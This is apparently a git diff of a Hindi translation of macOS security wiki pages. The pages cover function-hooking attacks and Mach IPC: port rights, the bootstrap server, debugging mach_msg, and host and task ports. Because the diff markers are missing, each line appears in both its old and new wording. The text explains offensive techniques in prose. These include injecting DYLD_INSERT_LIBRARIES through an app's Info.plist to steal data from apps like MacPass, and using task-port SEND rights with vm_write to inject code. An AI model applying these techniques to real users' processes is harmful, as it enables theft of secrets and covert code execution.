बस याद रखें कि यदि आप इसे नए क्रियान्वयन से कॉल करने जा रहे हैं तो **मूल वाले के क्रियान्वयन के पते** को **स्टोर** करें, क्योंकि इसे ओवरराइट करने से पहले इसे ढूंढना बाद में बहुत जटिल होगा।
```objectivec
#import <Foundation/Foundation.h>
#import <objc/runtime.h>
@ -288,13 +288,13 @@ return 0;
```
## Hooking Attack Methodology
इस पृष्ठ पर फ़ंक्शं को हुक करने के विभिन्न तरीकों पर चर्चा की गई। हालाँकि, इसमें **हमले के लिए प्रक्रिया के अंदर कोड चलाना** शामिल था।
इस पृष्ठ पर फ़ंक्शनों को हुक करने के विभिन्न तरीकों पर चर्चा की गई। हालाँकि, इसमें **हमले के लिए प्रक्रिया के अंदर कोड चलाना** शामिल था।
यह करने के लिए सबसे आसान तकनीक है [Dyld को पर्यावरण चर या हाइजैकिंग के माध्यम से इंजेक्ट करना](macos-library-injection/macos-dyld-hijacking-and-dyld_insert_libraries.md)। हालाँकि, मुझे लगता है कि यह [Dylib प्रक्रिया इंजेक्शन](macos-ipc-inter-process-communication/#dylib-process-injection-via-task-port) के माध्यम से भी किया जा सकता है।
यह करने के लिए सबसे आसान तकनीक है [Dyld को पर्यावरण चर के माध्यम से या हाइजैकिंग के माध्यम से](macos-library-injection/macos-dyld-hijacking-and-dyld_insert_libraries.md) इंजेक्ट करना। हालाँकि, मुझे लगता है कि यह [Dylib प्रक्रिया इंजेक्शन](macos-ipc-inter-process-communication/#dylib-process-injection-via-task-port) के माध्यम से भी किया जा सकता है।
हालाँकि, दोनों विकल्प **असुरक्षित** बाइनरी/प्रक्रियाओं तक **सीमित** हैं। सीमाओं के बारे में अधिक जानने के लिए प्रत्येक तकनीक की जाच करें।
हालाँकि, दोनों विकल्प **असुरक्षित** बाइनरी/प्रक्रियाओं तक **सीमित** हैं। सीमाओं के बारे में अधिक जानने के लिए प्रत्येक तकनीक की जाच करें।
हालाँकि, एक फ़ंक्शन हुकिंग हमला बहुत विशिष्ट है, एक हमलावर यह करेगा **प्रक्रिया के अंदर से संवेदनशील जानकारी चुराने के लिए** (यदि नहीं, तो आप बस एक प्रक्रिया इंजेक्शन हमला करेंगे)। और यह संवेदनशील जानकारी उपयोगकर्ता द्वारा डाउनलोड किए गए ऐप्स जैसे MacPass में स्थित हो सकती है।
हालाँकि, एक फ़ंक्शन हुकिंग हमला बहुत विशिष्ट है, एक हमलावर यह करेगा **प्रक्रिया के अंदर से संवेदनशील जानकारी चुराने के लिए** (यदि नहीं, तो आप बस एक प्रक्रिया इंजेक्शन हमला करेंगे)। और यह संवेदनशील जानकारी उपयोगकर्ता द्वारा डाउनलोड किए गए ऐप्स में स्थित हो सकती है जैसे कि MacPass
इसलिए हमलावर का वेक्टर या तो एक भेद्यता खोजने या एप्लिकेशन के हस्ताक्षर को हटाने के लिए होगा, **`DYLD_INSERT_LIBRARIES`** env चर को एप्लिकेशन के Info.plist के माध्यम से इंजेक्ट करना, कुछ इस तरह जोड़ना:
```xml

82
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/README.md
View File

@ -12,36 +12,36 @@
एक **पोर्ट** मच IPC का **बुनियादी** तत्व है। इसका उपयोग **संदेश भेजने और प्राप्त करने** के लिए किया जा सकता है।
प्रत्येक प्रक्रिया के पास एक **IPC तालिका** होती है, जिसमें प्रक्रिया के **मच पोर्ट्स** मिलते हैं। एक मच पोर्ट का नाम वास्तव में एक संख्या है (कर्नेल ऑब्जेक्ट के लिए एक पॉइंटर)।
प्रत्येक प्रक्रिया के पास एक **IPC तालिका** होती है, जिसमें प्रक्रिया के **मच पोर्ट्स** मिल सकते हैं। एक मच पोर्ट का नाम वास्तव में एक संख्या है (कर्नेल ऑब्जेक्ट के लिए एक पॉइंटर)।
एक प्रक्रिया किसी अन्य कार्य को कुछ अधिकारों के साथ **एक पोर्ट नाम भी भेज सकती है** और कर्नेल इस प्रविष्टि को **दूसरे कार्य की IPC तालिका** में प्रदर्शित करेगा।
एक प्रक्रिया किसी अन्य कार्य को कुछ अधिकारों के साथ एक पोर्ट नाम भी भेज सकती है और कर्नेल इस प्रविष्टि को **दूसरे कार्य की IPC तालिका** में प्रदर्शित करेगा।
### पोर्ट अधिकार
पोर्ट अधिकार, जो यह परिभाषित करते हैं कि एक कार्य कौन से संचालन कर सकता है, इस संचार के लिए कुंजी हैं। संभावित **पोर्ट अधिकार** हैं ([यहां से परिभाषाएँ](https://docs.darlinghq.org/internals/macos-specifics/mach-ports.html)):
- **प्राप्ति अधिकार**, जो पोर्ट पर भेजे गए संदेशों को प्राप्त करने की अनुमति देता है। मच पोर्ट्स MPSC (कई उत्पादक, एक उपभोक्ता) कतारें हैं, जिसका अर्थ है कि पूरे सिस्टम में **प्रत्येक पोर्ट के लिए केवल एक प्राप्ति अधिकार** हो सकता है (पाइप के विपरीत, जहां कई प्रक्रियाएं एक पाइप के पढ़ने के अंत के लिए फ़ाइल वर्णनकर्ता रख सकती हैं)।
- एक **प्राप्ति अधिकार वाला कार्य** संदेश प्राप्त कर सकता है और **भेजने के अधिकार** बना सकता है, जिससे यह संदेश भेजने में सक्षम होता है। मूल रूप से केवल **स्वयं का कार्य अपने पोर्ट पर प्राप्ति अधिकार रखता है**
- यदि प्राप्ति अधिकार का मालिक **मर जाता है** या इसे माप्त कर देता है, तो **भेजने का अधिकार बेकार हो जाता है (मृत नाम)**
- एक **प्राप्ति अधिकार वाला कार्य** संदेश प्राप्त कर सकता है और **भेजने के अधिकार** बना सकता है, जिससे इसे संदेश भेजने की अनुमति मिलती है। मूल रूप से केवल **स्वयं का कार्य अपने पोर्ट पर प्राप्ति अधिकार रखता है**
- यदि प्राप्ति अधिकार का मालिक **मर जाता है** या इसे मार देता है, तो **भेजने का अधिकार बेकार हो जाता है (मृत नाम)**
- **भेजने का अधिकार**, जो पोर्ट पर संदेश भेजने की अनुमति देता है।
- भेजने का अधिकार **क्लोन** किया जा सकता है, इसलिए एक कार्य जो भेजने का अधिकार रखता है, अधिकार को क्लोन कर सकता है और **इसे एक तीसरे कार्य को दे सकता है**
- ध्यान दें कि **पोर्ट अधिकार** को मच संदेशों के माध्यम से भी **बीतित** किया जा सकता है।
- **एक बार भेजने का अधिकार**, जो पोर्ट पर एक संदेश भेजने की अनुमति देता है और फिर गायब हो जाता है।
- यह अधिकार **क्लोन** नहीं किया जा सकता, लेकिन इसे **स्थानांतरित** किया जा सकता है।
- **पोर्ट सेट अधिकार**, जो एक _पोर्ट सेट_ को दर्शाता है न कि एकल पोर्ट। एक पोर्ट सेट से संदेश को डीक्यू करने का अर्थ है कि यह उस पोर्ट में से एक संदेश को डीक्यू करता है जो इसे शामिल करता है। पोर्ट सेट का उपयोग एक साथ कई पोर्ट पर सुनने के लिए किया जा सकता है, जैसे कि Unix में `select`/`poll`/`epoll`/`kqueue`
- **मृत नाम**, जो वास्तव में एक वास्तविक पोर्ट अधिकार नहीं है, बल्कि केवल एक प्लेसहोल्डर है। जब एक पोर्ट नष्ट होता है, तो पोर्ट के लिए सभी मौजूदा पोर्ट अधिकार मृत नामों में बदल जाते हैं।
- **मृत नाम**, जो वास्तव में एक वास्तविक पोर्ट अधिकार नहीं है, बल्कि केवल एक प्लेसहोल्डर है। जब एक पोर्ट नष्ट हो जाता है, तो पोर्ट के लिए सभी मौजूदा पोर्ट अधिकार मृत नामों में बदल जाते हैं।
**कार्य SEND अधिकारों को दूसरों को स्थानांतरित कर सकते हैं**, जिससे उन्हें वापस संदेश भेजने की अनुमति मिलती है। **SEND अधिकारों को भी क्लोन किया जा सकता है, इसलिए एक कार्य डुप्लिकेट कर सकता है और तीसरे कार्य को अधिकार दे सकता है**। यह, एक मध्यवर्ती प्रक्रिया के साथ मिलकर जिसे **बूटस्ट्रैप सर्वर** कहा जाता है, कार्यों के बीच प्रभावी संचार की अनुमति देता है।
**कार्य SEND अधिकारों को दूसरों को स्थानांतरित कर सकते हैं**, जिससे उन्हें वापस संदेश भेजने की अनुमति मिलती है। **SEND अधिकारों को भी क्लोन किया जा सकता है, इसलिए एक कार्य डुप्लिकेट कर सकता है और अधिकार को एक तीसरे कार्य को दे सकता है**। यह, एक मध्यवर्ती प्रक्रिया के साथ मिलकर जिसे **बूटस्ट्रैप सर्वर** कहा जाता है, कार्यों के बीच प्रभावी संचार की अनुमति देता है।
### फ़ाइल पोर्ट्स
फ़ाइल पोर्ट्स मैक पोर्ट्स में फ़ाइल वर्णनकर्ताओं को संलग्न करने की अनुमति देते हैं (मच पोर्ट अधिकारों का उपयोग करके)। एक दिए गए FD से `fileport_makeport` का उपयोग करके एक `fileport` बनाना संभव है और एक फ़ाइलपोर्ट से FD बनाने के लिए `fileport_makefd` का उपयोग करना संभव है।
फ़ाइल पोर्ट्स मैक पोर्ट्स में फ़ाइल वर्णनकर्ताओं को संलग्न करने की अनुमति देते हैं (मच पोर्ट अधिकारों का उपयोग करते हुए)। एक दिए गए FD से `fileport_makeport` का उपयोग करके एक `fileport` बनाना संभव है और एक फ़ाइलपोर्ट से FD बनाने के लिए `fileport_makefd` का उपयोग करना संभव है।
### संचार स्थापित करना
जैसा कि पहले उल्लेख किया गया है, मच संदेशों का उपयोग करके अधिकार भेजना संभव है, हालाँकि, आप **बिना पहले से अधिकार के मच संदेश भेजने का अधिकार नहीं भेज सकते**। तो, पहला संचार कैसे स्थापित किया जाता है?
जैसा कि पहले उल्लेख किया गया है, मच संदेशों का उपयोग करके अधिकार भेजना संभव है, हालाँकि, आप **बिना पहले से अधिकार के मच संदेश भेज नहीं सकते**। तो, पहला संचार कैसे स्थापित किया जाता है?
इसके लिए, **बूटस्ट्रैप सर्वर** (**launchd** मैक में) शामिल होता है, क्योंकि **हर कोई बूटस्ट्रैप सर्वर को SEND अधिकार प्राप्त कर सकता है**, इसलिए किसी अन्य प्रक्रिया को संदेश भेजने के लिए अधिकार मांगना संभव है:
इसके लिए, **बूटस्ट्रैप सर्वर** (**launchd** मैक में) शामिल होता है, क्योंकि **हर कोई बूटस्ट्रैप सर्वर को SEND अधिकार प्राप्त कर सकता है**, यह किसी अन्य प्रक्रिया को संदेश भेजने के लिए अधिकार मांगने की अनुमति देता है:
1. कार्य **A** एक **नया पोर्ट** बनाता है, उस पर **प्राप्ति अधिकार** प्राप्त करता है।
2. कार्य **A**, जो प्राप्ति अधिकार का धारक है, **पोर्ट के लिए एक SEND अधिकार उत्पन्न करता है**
@ -51,11 +51,11 @@
5. कार्य **B** बूटस्ट्रैप सर्वर के साथ बातचीत करता है ताकि सेवा नाम के लिए बूटस्ट्रैप **लुकअप** कर सके (`bootstrap_lookup`)। ताकि बूटस्ट्रैप सर्वर प्रतिक्रिया दे सके, कार्य B इसे एक **SEND अधिकार** भेजेगा जो उसने पहले लुकअप संदेश के भीतर बनाया था। यदि लुकअप सफल होता है, तो **सर्वर SEND अधिकार को डुप्लिकेट करता है** जो कार्य A से प्राप्त हुआ था और **इसे कार्य B को संप्रेषित करता है**
- याद रखें कि कोई भी बूटस्ट्रैप सर्वर को SEND अधिकार प्राप्त कर सकता है।
6. इस SEND अधिकार के साथ, **कार्य B** **कार्य A** को **संदेश भेजने में सक्षम है**
7. द्विदिशीय संचार के लिए आमतौर पर कार्य **B** एक **प्राप्ति** अधिकार और एक **SEND** अधिकार के साथ एक नया पोर्ट उत्पन्न करता है, और **SEND अधिकार कार्य A को देता है** ताकि वह कार्य B को संदेश भेज सके (द्विदिशीय संचार)।
7. द्विदिश संचार के लिए आमतौर पर कार्य **B** एक **प्राप्ति** अधिकार और एक **SEND** अधिकार के साथ एक नया पोर्ट उत्पन्न करता है, और **SEND अधिकार कार्य A को देता है** ताकि वह कार्य B को संदेश भेज सके (द्विदिश संचार)।
बूटस्ट्रैप सर्वर **सेवा नाम** का प्रमाणीकरण नहीं कर सकता जो एक कार्य द्वारा दावा किया गया है। इसका अर्थ है कि एक **कार्य** संभावित रूप से **किसी भी सिस्टम कार्य का अनुकरण** कर सकता है, जैसे कि झूठा **प्राधिकरण सेवा नाम का दावा करना** और फिर हर अनुरोध को मंजूरी देना।
फिर, Apple **सिस्टम-प्रदत्त सेवाओं के नाम** को सुरक्षित कॉन्फ़िगरेशन फ़ाइलों में संग्रहीत करता है, जो **SIP-सुरक्षित** निर्देशिकाओं में स्थित हैं: `/System/Library/LaunchDaemons` और `/System/Library/LaunchAgents`। प्रत्येक सेवा नाम के साथ, **संबंधित बाइनरी भी संग्रहीत होती है**। बूटस्ट्रैप सर्वर, इन सेवा नामों में से प्रत्येक के लिए एक **प्राप्ति अधिकार** बनाएगा और रखेगा।
फिर, Apple **सिस्टम-प्रदत्त सेवाओं के नाम** को सुरक्षित कॉन्फ़िगरेशन फ़ाइलों में संग्रहीत करता है, जो **SIP-सुरक्षित** निर्देशिकाओं में स्थित हैं: `/System/Library/LaunchDaemons` और `/System/Library/LaunchAgents`। प्रत्येक सेवा नाम के साथ, **संबंधित बाइनरी भी संग्रहीत होती है**। बूटस्ट्रैप सर्वर, इन सेवा नामों के लिए एक **प्राप्ति अधिकार बनाएगा और रखेगा**
इन पूर्वनिर्धारित सेवाओं के लिए, **लुकअप प्रक्रिया थोड़ी भिन्न होती है**। जब एक सेवा नाम की खोज की जा रही होती है, तो launchd सेवा को गतिशील रूप से शुरू करता है। नया कार्यप्रवाह इस प्रकार है:
@ -63,9 +63,9 @@
- **launchd** जांचता है कि कार्य चल रहा है और यदि नहीं है, तो **इसे शुरू करता है**
- कार्य **A** (सेवा) एक **बूटस्ट्रैप चेक-इन** (`bootstrap_check_in()`) करता है। यहाँ, **बूटस्ट्रैप** सर्वर एक SEND अधिकार बनाता है, इसे रखता है, और **प्राप्ति अधिकार कार्य A को स्थानांतरित करता है**
- launchd **SEND अधिकार को डुप्लिकेट करता है और इसे कार्य B को भेजता है**
- कार्य **B** एक नया पोर्ट उत्पन्न करता है जिसमें एक **प्राप्ति** अधिकार और एक **SEND** अधिकार होता है, और **SEND अधिकार कार्य A को देता है** (सेवा) ताकि वह कार्य B को संदेश भेज सके (द्विदिशीय संचार)।
- कार्य **B** एक नया पोर्ट उत्पन्न करता है जिसमें एक **प्राप्ति** अधिकार और एक **SEND** अधिकार होता है, और **SEND अधिकार कार्य A को देता है** (सेवा) ताकि वह कार्य B को संदेश भेज सके (द्विदिश संचार)।
हालांकि, यह प्रक्रिया केवल पूर्वनिर्धारित सिस्टम कार्यों पर लागू होती है। गैर-प्रणाली कार्य अभी भी मूल रूप से वर्णित तरीके से कार्य करते हैं, जो संभावित रूप से अनुकरण की अनुमति दे सकते हैं
हालांकि, यह प्रक्रिया केवल पूर्वनिर्धारित सिस्टम कार्यों पर लागू होती है। गैर-प्रणाली कार्य अभी भी मूल रूप से वर्णित तरीके से कार्य करते हैं, जो अनुकरण की अनुमति दे सकता है
> [!CAUTION]
> इसलिए, launchd कभी भी क्रैश नहीं होना चाहिए या पूरा सिस्टम क्रैश हो जाएगा।
@ -74,7 +74,7 @@
[यहां अधिक जानकारी प्राप्त करें](https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing/)
`mach_msg` फ़ंक्शन, जो मूल रूप से एक सिस्टम कॉल है, मच संदेश भेजने और प्राप्त करने के लिए उपयोग किया जाता है। फ़ंक्शन को भेजे जाने वाले संदेश को प्रारंभिक तर्क के रूप में आवश्यक होता है। यह संदेश `mach_msg_header_t` संरचना के साथ शुरू होना चाहिए, इसके बाद वास्तविक संदेश सामग्री होती है। संरचना को इस प्रकार परिभाषित किया गया है:
`mach_msg` फ़ंक्शन, जो मूल रूप से एक सिस्टम कॉल है, मच संदेश भेजने और प्राप्त करने के लिए उपयोग किया जाता है। फ़ंक्शन को भेजे जाने वाले संदेश को प्रारंभिक तर्क के रूप में आवश्यक है। यह संदेश `mach_msg_header_t` संरचना के साथ शुरू होना चाहिए, इसके बाद वास्तविक संदेश सामग्री होती है। संरचना को इस प्रकार परिभाषित किया गया है:
```c
typedef struct {
mach_msg_bits_t msgh_bits;
@ -131,7 +131,7 @@ voucher, स्थानीय और दूरस्थ पोर्ट मे
#### जटिल संदेश
हालांकि, अन्य अधिक **जटिल** संदेश हैं, जैसे कि अतिरिक्त पोर्ट अधिकारों को पास करने या मेमोरी साझा करने वाले, जहाँ कर्नेल को भी इन वस्तुओं को प्राप्तकर्ता को भेजने की आवश्यकता होती है। इन मामलों में, हेडर `msgh_bits` का सबसे महत्वपूर्ण बिट सेट किया जाता है।
हालांकि, अन्य अधिक **जटिल** संदेश हैं, जैसे अतिरिक्त पोर्ट अधिकारों को पास करने या मेमोरी साझा करने वाले, जहाँ कर्नेल को भी इन वस्तुओं को प्राप्तकर्ता को भेजने की आवश्यकता होती है। इन मामलों में, हेडर `msgh_bits` का सबसे महत्वपूर्ण बिट सेट होता है।
पास करने के लिए संभावित वर्णनकर्ताओं को [**`mach/message.h`**](https://opensource.apple.com/source/xnu/xnu-7195.81.3/osfmk/mach/message.h.auto.html) में परिभाषित किया गया है:
```c
@ -153,7 +153,7 @@ mach_msg_descriptor_type_t type : 8;
In 32बिट्स में, सभी विवरण 12B होते हैं और विवरण प्रकार 11वें में होता है। 64 बिट्स में, आकार भिन्न होते हैं।
> [!CAUTION]
> कर्नेल एक कार्य से दूसरे कार्य में विवरणों की कॉपी करेगा लेकिन पहले **कर्नेल मेमोरी में एक कॉपी बनाएगा**। इस तकनीक को "फेंग शुई" के रूप में जाना जाता है और इसे कई शोषणों में **कर्नेल को अपनी मेमोरी में डेटा कॉपी करने** के लिए दुरुपयोग किया गया है जिससे एक प्रक्रिया अपने लिए विवरण भेज सके। फिर प्रक्रिया संदेश प्राप्त कर सकती है (कर्नेल उन्हें मुक्त करेगा)।
> कर्नेल एक कार्य से दूसरे कार्य में विवरणों की कॉपी करेगा लेकिन पहले **कर्नेल मेमोरी में एक कॉपी बनाएगा**। इस तकनीक को "फेंग शुई" के रूप में जाना जाता है और इसे कई शोषणों में **कर्नेल को अपनी मेमोरी में डेटा कॉपी करने** के लिए दुरुपयोग किया गया है जिससे एक प्रक्रिया अपने लिए विवरण भेजती है। फिर प्रक्रिया संदेश प्राप्त कर सकती है (कर्नेल उन्हें मुक्त करेगा)।
>
> यह भी संभव है कि **एक कमजोर प्रक्रिया को पोर्ट अधिकार भेजें**, और पोर्ट अधिकार बस प्रक्रिया में दिखाई देंगे (भले ही वह उन्हें संभाल नहीं रही हो)।
@ -174,7 +174,7 @@ In 32बिट्स में, सभी विवरण 12B होते ह
### डिबग mach_msg
चूंकि फ़ंक्शन **`mach_msg`** और **`mach_msg_overwrite`** संदेश भेजने और प्राप्त करने के लिए उपयोग किए जाते हैं, इसलिए उन पर एक ब्रेकपॉइंट सेट करने से भेजे गए और प्राप्त किए गए संदेशों का निरीक्षण करने की अनुमति मिलेगी।
चूंकि फ़ंक्शन **`mach_msg`** और **`mach_msg_overwrite`** संदेश भेजने और प्राप्त करने के लिए उपयोग किए जाते हैं, इसलिए उन पर एक ब्रेकपॉइंट सेट करने से भेजे गए और प्राप्त संदेशों का निरीक्षण करने की अनुमति मिलेगी।
उदाहरण के लिए, किसी भी एप्लिकेशन को डिबग करना शुरू करें जिसे आप डिबग कर सकते हैं क्योंकि यह **`libSystem.B` लोड करेगा जो इस फ़ंक्शन का उपयोग करेगा**।
@ -228,7 +228,7 @@ x4 = 0x0000000000001f03 ;mach_port_name_t (rcv_name)
x5 = 0x0000000000000000 ;mach_msg_timeout_t (timeout)
x6 = 0x0000000000000000 ;mach_port_name_t (notify)
```
संदेश हेडर का निरीक्षण करें पहले तर्क की जांच करें:
संदेश हेडर की जांच करें पहले तर्क की जांच करते हुए:
```armasm
(lldb) x/6w $x0
0x124e04ce8: 0x00131513 0x00000388 0x00000807 0x00001f03
@ -241,7 +241,7 @@ x6 = 0x0000000000000000 ;mach_port_name_t (notify)
; 0x00000b07 -> mach_port_name_t (msgh_voucher_port)
; 0x40000322 -> mach_msg_id_t (msgh_id)
```
`mach_msg_bits_t` प्रकार का उपयोग करना एक उत्तर की अनुमति देने के लिए बहुत सामान्य है।
उस प्रकार का `mach_msg_bits_t` उत्तर की अनुमति देने के लिए बहुत सामान्य है।
### पोर्टों की गणना करें
```bash
@ -418,23 +418,23 @@ printf("Sent a message\n");
इनका विभाजन 2 समूहों में किया गया है: **पहले 7 पोर्ट कर्नेल द्वारा स्वामित्व में हैं**, जिसमें 1 `HOST_PORT`, 2 `HOST_PRIV_PORT`, 3 `HOST_IO_MASTER_PORT` और 7 `HOST_MAX_SPECIAL_KERNEL_PORT` है।\
संख्या **8** से शुरू होने वाले पोर्ट **सिस्टम डेमन्स द्वारा स्वामित्व में हैं** और इन्हें [**`host_special_ports.h`**](https://opensource.apple.com/source/xnu/xnu-4570.1.46/osfmk/mach/host_special_ports.h.auto.html) में घोषित किया गया है।
- **होस्ट पोर्ट**: यदि किसी प्रक्रिया के पास इस पोर्ट पर **SEND** विशेषाधिकार है, तो वह **सूचना** प्राप्त कर सकती है **सिस्टम** के बारे में, जैसे:
- **होस्ट पोर्ट**: यदि किसी प्रक्रिया के पास इस पोर्ट पर **SEND** विशेषाधिकार है, तो वह इसकी रूटीन को कॉल करके **सिस्टम** के बारे में **जानकारी** प्राप्त कर सकती है जैसे:
- `host_processor_info`: प्रोसेसर जानकारी प्राप्त करें
- `host_info`: होस्ट जानकारी प्राप्त करें
- `host_virtual_physical_table_info`: वर्चुअल/फिजिकल पेज टेबल (MACH_VMDEBUG की आवश्यकता है)
- `host_statistics`: होस्ट सांख्यिकी प्राप्त करें
- `mach_memory_info`: कर्नेल मेमोरी लेआउट प्राप्त करें
- **होस्ट प्रिव पोर्ट**: इस पोर्ट पर **SEND** अधिकार वाली प्रक्रिया **विशेषाधिकार प्राप्त क्रियाएँ** कर सकती है, जैसे बूट डेटा दिखाना या कर्नेल एक्सटेंशन लोड करने की कोशिश करना। इस अनुमति को प्राप्त करने के लिए **प्रक्रिया को रूट होना चाहिए**
- **होस्ट प्रिव पोर्ट**: इस पोर्ट पर **SEND** अधिकार वाली प्रक्रिया **विशेषाधिकार प्राप्त क्रियाएँ** कर सकती है जैसे बूट डेटा दिखाना या कर्नेल एक्सटेंशन लोड करने की कोशिश करना। इस अनुमति को प्राप्त करने के लिए **प्रक्रिया को रूट होना चाहिए**
- इसके अलावा, **`kext_request`** API को कॉल करने के लिए अन्य अधिकारों की आवश्यकता होती है **`com.apple.private.kext*`** जो केवल Apple बाइनरी को दिए जाते हैं।
- अन्य रूटीन जो कॉल किए जा सकते हैं:
- `host_get_boot_info`: `machine_boot_info()` प्राप्त करें
- `host_priv_statistics`: विशेषाधिकार प्राप्त सांख्यिकी प्राप्त करें
- `vm_allocate_cpm`: सन्निहित भौतिक मेमोरी आवंटित करें
- `host_processors`: होस्ट प्रोसेसर को भेजें अधिकार
- `mach_vm_wire`: मेमोरी को निवास में बनाएं
- `mach_vm_wire`: मेमोरी को निवासित बनाएं
- चूंकि **रूट** इस अनुमति को एक्सेस कर सकता है, यह `host_set_[special/exception]_port[s]` को कॉल करके **होस्ट विशेष या अपवाद पोर्ट्स को हाइजैक** कर सकता है।
यह संभव है कि **सभी होस्ट विशेष पोर्ट्स को देखें**:
यह संभव है कि **सभी होस्ट विशेष पोर्ट्स** को चलाकर देखा जा सके:
```bash
procexp all ports | grep "HSP"
```
@ -452,23 +452,23 @@ world.*/
#define TASK_PAGED_LEDGER_PORT 6 /* Paged resource ledger for task. */
```
- **TASK_KERNEL_PORT**\[task-self send right]: इस कार्य को नियंत्रित करने के लिए उपयोग किया जाने वाला पोर्ट। इस कार्य को प्रभावित करने वाले संदेश भेजने के लिए उपयोग किया जाता है। यह **mach_task_self (नीचे कार्य पोर्ट देखें)** द्वारा लौटाया गया पोर्ट है।
- **TASK_BOOTSTRAP_PORT**\[bootstrap send right]: कार्य का बूटस्ट्रैप पोर्ट। अन्य सिस्टम सेवा पोर्ट की वापसी के लिए संदेश भेजने के लिए उपयोग किया जाता है।
- **TASK_HOST_NAME_PORT**\[host-self send right]: समाहित होस्ट की जानकारी का अनुरोध करने के लिए उपयोग किया जाने वाला पोर्ट। यह **mach_host_self** द्वारा लौटाया गया पोर्ट है।
- **TASK_BOOTSTRAP_PORT**\[bootstrap send right]: कार्य का बूटस्ट्रैप पोर्ट। अन्य सिस्टम सेवा पोर्ट्स की वापसी के लिए संदेश भेजने के लिए उपयोग किया जाता है।
- **TASK_HOST_NAME_PORT**\[host-self send right]: समाहित होस्ट की जानकारी मांगने के लिए उपयोग किया जाने वाला पोर्ट। यह **mach_host_self** द्वारा लौटाया गया पोर्ट है।
- **TASK_WIRED_LEDGER_PORT**\[ledger send right]: वह पोर्ट जो इस कार्य के लिए वायर्ड कर्नेल मेमोरी का स्रोत नामित करता है।
- **TASK_PAGED_LEDGER_PORT**\[ledger send right]: वह पोर्ट जो इस कार्य के लिए डिफ़ॉल्ट मेमोरी प्रबंधित मेमोरी का स्रोत नामित करता है।
### कार्य पोर्ट
शुरुआत में Mach में "प्रक्रियाएँ" नहीं थीं, बल्कि "कार्य" थे जिन्हें थ्रेड्स के कंटेनर के रूप में अधिक माना जाता था। जब Mach को BSD के साथ जोड़ा गया, **तो प्रत्येक कार्य को एक BSD प्रक्रिया से संबंधित किया गया**। इसलिए हर BSD प्रक्रिया के पास वह विवरण होता है जिसकी उसे एक प्रक्रिया बनने क आवश्यकता होती है और हर Mach कार्य के पास भी इसके आंतरिक कार्य होते हैं (सिवाय अस्तित्वहीन pid 0 के जो `kernel_task` है)।
शुरुआत में Mach में "प्रक्रियाएँ" नहीं थीं, इसमें "कार्य" थे जो थ्रेड्स के कंटेनर के समान माने जाते थे। जब Mach को BSD के साथ जोड़ा गया, **तो प्रत्येक कार्य को एक BSD प्रक्रिया से संबंधित किया गया**। इसलिए हर BSD प्रक्रिया के पास वह विवरण होता है जिसकी उसे एक प्रक्रिया बनने के लिए आवश्यकता होती है और हर Mach कार्य के पास भी इसके आंतरिक कार्य होते हैं (सिवाय अस्तित्वहीन pid 0 के जो `kernel_task` है)।
इससे संबंधित दो बहुत दिलचस्प कार्य हैं:
- `task_for_pid(target_task_port, pid, &task_port_of_pid)`: निर्दिष्ट `pid` द्वारा संबंधित कार्य के कार्य पोर्ट के लिए एक SEND अधिकार प्राप्त करें और इसे निर्दिष्ट `target_task_port` (जो आमतौर पर वह कॉलर कार्य होता है जिसने `mach_task_self()` का उपयोग किया है, लेकिन यह एक अलग कार्य पर एक SEND पोर्ट भी हो सकता है) को दें।
- `task_for_pid(target_task_port, pid, &task_port_of_pid)`: निर्दिष्ट `pid` द्वारा संबंधित कार्य के कार्य पोर्ट के लिए एक SEND अधिकार प्राप्त करें और इसे निर्दिष्ट `target_task_port` (जो आमतौर पर वह कॉलर कार्य होता है जिसने `mach_task_self()` का उपयोग किया है, लेकिन यह एक अलग कार्य पर SEND पोर्ट भी हो सकता है) को दें।
- `pid_for_task(task, &pid)`: एक कार्य को SEND अधिकार दिया गया है, तो यह पता करें कि यह कार्य किस PID से संबंधित है।
कार्य के भीतर क्रियाएँ करने के लिए, कार्य को `mach_task_self()` को कॉल करके अपने लिए एक `SEND` अधिकार की आवश्यकता थी (जो `task_self_trap` (28) का उपयोग करता है)। इस अनुमति के साथ एक कार्य कई क्रियाएँ कर सकता है जैसे:
- `task_threads`: कार्य के थ्रेड्स के सभी कार्य पोर्ट पर SEND अधिकार प्राप्त करें
- `task_threads`: कार्य के थ्रेड्स के सभी कार्य पोर्ट्स पर SEND अधिकार प्राप्त करें
- `task_info`: एक कार्य के बारे में जानकारी प्राप्त करें
- `task_suspend/resume`: एक कार्य को निलंबित या फिर से शुरू करें
- `task_[get/set]_special_port`
@ -479,19 +479,19 @@ world.*/
> [!CAUTION]
> ध्यान दें कि एक **अलग कार्य** के कार्य पोर्ट पर SEND अधिकार के साथ, एक अलग कार्य पर ऐसी क्रियाएँ करना संभव है।
इसके अलावा, task_port भी **`vm_map`** पोर्ट है जो एक कार्य के भीतर मेमोरी को **पढ़ने और हेरफेर करने** की अनुमति देता है जैसे कि `vm_read()` और `vm_write()` जैसी कार्यों के साथ। इसका मतलब यह है कि एक कार्य जिसके पास एक अलग कार्य के task_port पर SEND अधिकार हैं, वह उस कार्य में **कोड इंजेक्ट** करने में सक्षम होगा।
इसके अलावा, task_port भी **`vm_map`** पोर्ट है जो एक कार्य के भीतर मेमोरी को **पढ़ने और हेरफेर करने** की अनुमति देता है जैसे कि `vm_read()` और `vm_write()`। इसका मतलब यह है कि एक कार्य जिसके पास एक अलग कार्य के task_port पर SEND अधिकार हैं, वह उस कार्य में **कोड इंजेक्ट** करने में सक्षम होगा।
याद रखें कि क्योंकि **कर्नेल भी एक कार्य है**, यदि कोई व्यक्ति **`kernel_task`** पर **SEND अनुमतियाँ** प्राप्त करने में सफल होता है, तो वह कर्नेल को कुछ भी निष्पादित करने के लिए मजबूर कर सकता है (जेलब्रेक)।
- कॉल करें `mach_task_self()` इस पोर्ट के लिए **नाम प्राप्त करने** के लिए कॉलर कार्य के लिए। यह पोर्ट केवल **`exec()`** के माध्यम से **विरासत में** लिया जाता है; `fork()` के साथ बनाए गए नए कार्य को एक नया कार्य पोर्ट मिलता है (एक विशेष मामले के रूप में, एक कार्य को `exec()` के बाद एक suid बाइनरी में भी एक नया कार्य पोर्ट मिलता है)। एक कार्य को उत्पन्न करने और इसके पोर्ट को प्राप्त करने का एकमात्र तरीका ["पोर्ट स्वैप डांस"](https://robert.sesek.com/2014/1/changes_to_xnu_mach_ipc.html) करना है जबकि `fork()` कर रहे हैं।
- ये पोर्ट तक पहुँचने के लिए प्रतिबंध हैं (बाइनरी `AppleMobileFileIntegrity` से `macos_task_policy` से):
